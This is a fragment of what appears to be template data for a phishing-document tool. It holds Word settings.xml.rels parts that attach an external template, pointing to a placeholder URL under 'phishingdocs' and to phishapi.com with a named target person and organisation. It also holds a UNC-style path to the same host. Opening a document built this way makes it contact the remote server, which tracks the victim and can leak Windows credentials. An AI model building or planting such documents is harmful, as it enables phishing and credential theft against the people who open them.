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ttachedTemplate r:id="rId999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https://phishapi.com/phishingdocs/?target=Joe Smith&amp;org=Evil Corp&amp;id=41589c9e-3d93-11e9-b650-02e43fe3bbca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\\phishapi.com/phish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
</file>

<file path=word/_rels/settings.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
                        <Relationship Id="rId9999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
                        Target="HTTPVALUE://URLVALUE/phishingdocs/REPLACEME"
                        TargetMode="External"/>
                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